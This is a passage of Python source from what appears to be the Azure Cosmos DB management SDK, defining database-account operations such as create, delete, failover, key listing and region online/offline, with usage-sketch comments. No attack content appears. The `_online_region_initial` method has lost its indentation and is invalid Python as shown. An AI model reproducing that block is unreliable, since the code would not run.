        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns DatabaseAccount or
         ClientRawResponse<DatabaseAccount> if raw==True
        :rtype:
         ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.DatabaseAccount]
         or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.DatabaseAccount]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._create_or_update_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            create_update_parameters=create_update_parameters,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            deserialized = self._deserialize('DatabaseAccount', response)

            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response

            return deserialized

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}'}
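    # Usage sketch (hypothetical values; `client` is assumed to be an
    # authenticated CosmosDB management client). The PUT body is built from
    # the DatabaseAccountCreateUpdateParameters model, whose `locations` list
    # assigns failover priorities (0 = write region):
    #
    #     from azure.mgmt.cosmosdb.models import (
    #         DatabaseAccountCreateUpdateParameters, Location)
    #
    #     params = DatabaseAccountCreateUpdateParameters(
    #         location='West US',
    #         locations=[Location(location_name='West US', failover_priority=0)])
    #     poller = client.database_accounts.create_or_update(
    #         'my-resource-group', 'my-account', params)
    #     account = poller.result()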

    def _delete_initial(
            self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
        # Construct URL
        url = self.delete.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.delete(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [202, 204]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response

    def delete(
            self, resource_group_name, account_name, custom_headers=None, raw=False, polling=True, **operation_config):
        """Deletes an existing Azure Cosmos DB database account.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns None or
         ClientRawResponse<None> if raw==True
        :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._delete_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}'}
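    # Usage sketch (hypothetical names): the delete poller's result is None,
    # so callers typically just wait for completion:
    #
    #     client.database_accounts.delete('my-resource-group', 'my-account').wait()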

    def _failover_priority_change_initial(
            self, resource_group_name, account_name, failover_policies, custom_headers=None, raw=False, **operation_config):
        failover_parameters = models.FailoverPolicies(failover_policies=failover_policies)

        # Construct URL
        url = self.failover_priority_change.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(failover_parameters, 'FailoverPolicies')

        # Construct and send request
        request = self._client.post(url, query_parameters, header_parameters, body_content)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [202, 204]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response

    def failover_priority_change(
            self, resource_group_name, account_name, failover_policies, custom_headers=None, raw=False, polling=True, **operation_config):
        """Changes the failover priority for the Azure Cosmos DB database
        account. A failover priority of 0 indicates a write region. The
        maximum value for a failover priority = (total number of regions - 1).
        Failover priority values must be unique for each of the regions in
        which the database account exists.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param failover_policies: List of failover policies.
        :type failover_policies:
         list[~azure.mgmt.cosmosdb.models.FailoverPolicy]
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns None or
         ClientRawResponse<None> if raw==True
        :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._failover_priority_change_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            failover_policies=failover_policies,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    failover_priority_change.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/failoverPriorityChange'}
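    # Usage sketch (hypothetical values): promote 'East US' to the write
    # region (priority 0) and demote 'West US' to a read region. Priorities
    # must be unique and cover 0..(number of regions - 1):
    #
    #     from azure.mgmt.cosmosdb.models import FailoverPolicy
    #
    #     policies = [
    #         FailoverPolicy(location_name='East US', failover_priority=0),
    #         FailoverPolicy(location_name='West US', failover_priority=1),
    #     ]
    #     client.database_accounts.failover_priority_change(
    #         'my-resource-group', 'my-account', policies).wait()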

    def list(
            self, custom_headers=None, raw=False, **operation_config):
        """Lists all the Azure Cosmos DB database accounts available under the
        subscription.

        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of DatabaseAccount
        :rtype:
         ~azure.mgmt.cosmosdb.models.DatabaseAccountPaged[~azure.mgmt.cosmosdb.models.DatabaseAccount]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        def prepare_request(next_link=None):
            if not next_link:
                # Construct URL
                url = self.list.metadata['url']
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
                }
                url = self._client.format_url(url, **path_format_arguments)

                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
            else:
                url = next_link
                query_parameters = {}

            # Construct headers
            header_parameters = {}
            header_parameters['Accept'] = 'application/json'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request

        def internal_paging(next_link=None):
            request = prepare_request(next_link)

            response = self._client.send(request, stream=False, **operation_config)

            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp

            return response

        # Deserialize response
        header_dict = None
        if raw:
            header_dict = {}
        deserialized = models.DatabaseAccountPaged(internal_paging, self._deserialize.dependencies, header_dict)

        return deserialized
    list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DocumentDB/databaseAccounts'}
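    # Usage sketch (`client` is a hypothetical authenticated management
    # client): the returned DatabaseAccountPaged object is an iterator that
    # follows `next_link` and fetches further pages transparently:
    #
    #     for account in client.database_accounts.list():
    #         print(account.name, account.document_endpoint)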

    def list_by_resource_group(
            self, resource_group_name, custom_headers=None, raw=False, **operation_config):
        """Lists all the Azure Cosmos DB database accounts available under the
        given resource group.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: An iterator like instance of DatabaseAccount
        :rtype:
         ~azure.mgmt.cosmosdb.models.DatabaseAccountPaged[~azure.mgmt.cosmosdb.models.DatabaseAccount]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        def prepare_request(next_link=None):
            if not next_link:
                # Construct URL
                url = self.list_by_resource_group.metadata['url']
                path_format_arguments = {
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
                    'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
                }
                url = self._client.format_url(url, **path_format_arguments)

                # Construct parameters
                query_parameters = {}
                query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
            else:
                url = next_link
                query_parameters = {}

            # Construct headers
            header_parameters = {}
            header_parameters['Accept'] = 'application/json'
            if self.config.generate_client_request_id:
                header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
            if custom_headers:
                header_parameters.update(custom_headers)
            if self.config.accept_language is not None:
                header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

            # Construct and send request
            request = self._client.get(url, query_parameters, header_parameters)
            return request

        def internal_paging(next_link=None):
            request = prepare_request(next_link)

            response = self._client.send(request, stream=False, **operation_config)

            if response.status_code not in [200]:
                exp = CloudError(response)
                exp.request_id = response.headers.get('x-ms-request-id')
                raise exp

            return response

        # Deserialize response
        header_dict = None
        if raw:
            header_dict = {}
        deserialized = models.DatabaseAccountPaged(internal_paging, self._deserialize.dependencies, header_dict)

        return deserialized
    list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts'}

    def list_keys(
            self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
        """Lists the access keys for the specified Azure Cosmos DB database
        account.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: DatabaseAccountListKeysResult or ClientRawResponse if
         raw=true
        :rtype: ~azure.mgmt.cosmosdb.models.DatabaseAccountListKeysResult or
         ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = self.list_keys.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.post(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('DatabaseAccountListKeysResult', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    list_keys.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/listKeys'}
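    # Usage sketch (hypothetical names): listKeys is a POST rather than a GET
    # because the keys are secrets. In this SDK version the result exposes
    # attributes such as `primary_master_key`:
    #
    #     keys = client.database_accounts.list_keys(
    #         'my-resource-group', 'my-account')
    #     account_key = keys.primary_master_key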

    def list_connection_strings(
            self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
        """Lists the connection strings for the specified Azure Cosmos DB
        database account.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: DatabaseAccountListConnectionStringsResult or
         ClientRawResponse if raw=true
        :rtype:
         ~azure.mgmt.cosmosdb.models.DatabaseAccountListConnectionStringsResult
         or ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = self.list_connection_strings.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.post(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('DatabaseAccountListConnectionStringsResult', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    list_connection_strings.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/listConnectionStrings'}

    def _offline_region_initial(
            self, resource_group_name, account_name, region, custom_headers=None, raw=False, **operation_config):
        region_parameter_for_offline = models.RegionForOnlineOffline(region=region)

        # Construct URL
        url = self.offline_region.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(region_parameter_for_offline, 'RegionForOnlineOffline')

        # Construct and send request
        request = self._client.post(url, query_parameters, header_parameters, body_content)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 202]:
            raise models.ErrorResponseException(self._deserialize, response)

        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response

    def offline_region(
            self, resource_group_name, account_name, region, custom_headers=None, raw=False, polling=True, **operation_config):
        """Offline the specified region for the specified Azure Cosmos DB
        database account.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param region: Cosmos DB region, with spaces between words and each
         word capitalized.
        :type region: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns None or
         ClientRawResponse<None> if raw==True
        :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
        :raises:
         :class:`ErrorResponseException<azure.mgmt.cosmosdb.models.ErrorResponseException>`
        """
        raw_result = self._offline_region_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            region=region,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    offline_region.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/offlineRegion'}
def _online_region_initial(
self, resource_group_name, account_name, region, custom_headers=None, raw=False, **operation_config):
region_parameter_for_online = models.RegionForOnlineOffline(region=region)
# Construct URL
url = self.online_region.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(region_parameter_for_online, 'RegionForOnlineOffline')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
        if response.status_code not in [200, 202]:
            raise models.ErrorResponseException(self._deserialize, response)

        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response

    def online_region(
            self, resource_group_name, account_name, region, custom_headers=None, raw=False, polling=True, **operation_config):
        """Online the specified region for the specified Azure Cosmos DB database
        account.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param region: Cosmos DB region, with spaces between words and each
         word capitalized.
        :type region: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns None or
         ClientRawResponse<None> if raw==True
        :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
        :raises:
         :class:`ErrorResponseException<azure.mgmt.cosmosdb.models.ErrorResponseException>`
        """
        raw_result = self._online_region_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            region=region,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    online_region.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/onlineRegion'}
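The `polling` argument dispatch used by `online_region` and the other long-running-operation methods can be sketched in isolation. This is a minimal stand-alone illustration with stub classes (not the real `msrest.polling` types): `polling=True` selects ARM polling with the configured delay, `polling=False` disables polling, and any other value is treated as a caller-supplied polling strategy object.

```python
class ARMPolling:
    """Stand-in for msrest.polling.ARMPolling."""
    def __init__(self, timeout):
        self.timeout = timeout


class NoPolling:
    """Stand-in for msrest.polling.NoPolling."""


def select_polling_method(polling, lro_delay):
    # Mirrors the True / False / custom-object branches in the SDK code above.
    if polling is True:
        return ARMPolling(lro_delay)
    elif polling is False:
        return NoPolling()
    else:
        return polling
```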
    def get_read_only_keys(
            self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
        """Lists the read-only access keys for the specified Azure Cosmos DB
        database account.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: DatabaseAccountListReadOnlyKeysResult or ClientRawResponse if
         raw=true
        :rtype:
         ~azure.mgmt.cosmosdb.models.DatabaseAccountListReadOnlyKeysResult or
         ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = self.get_read_only_keys.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('DatabaseAccountListReadOnlyKeysResult', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    get_read_only_keys.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/readonlykeys'}
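Each operation stores its URL template on the method's `metadata` attribute and substitutes the path arguments at call time via `self._client.format_url`. A hypothetical stand-in for that substitution step (the real client also validates against the serializer constraints, which this sketch omits) could look like:

```python
from urllib.parse import quote


def format_url(template, **path_args):
    # Percent-encode each path argument, then substitute it into the
    # metadata URL template. Hypothetical stand-in for format_url.
    return template.format(
        **{k: quote(str(v), safe='') for k, v in path_args.items()})


url = format_url(
    '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}'
    '/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/readonlykeys',
    subscriptionId='00000000-0000-0000-0000-000000000000',
    resourceGroupName='my-rg',
    accountName='mycosmosacct',
)
```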
    def list_read_only_keys(
            self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
        """Lists the read-only access keys for the specified Azure Cosmos DB
        database account.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: DatabaseAccountListReadOnlyKeysResult or ClientRawResponse if
         raw=true
        :rtype:
         ~azure.mgmt.cosmosdb.models.DatabaseAccountListReadOnlyKeysResult or
         ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = self.list_read_only_keys.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.post(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None
        if response.status_code == 200:
            deserialized = self._deserialize('DatabaseAccountListReadOnlyKeysResult', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    list_read_only_keys.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/readonlykeys'}

    def _regenerate_key_initial(
            self, resource_group_name, account_name, key_kind, custom_headers=None, raw=False, **operation_config):
        key_to_regenerate = models.DatabaseAccountRegenerateKeyParameters(key_kind=key_kind)

        # Construct URL
        url = self.regenerate_key.metadata['url']
        path_format_arguments = {
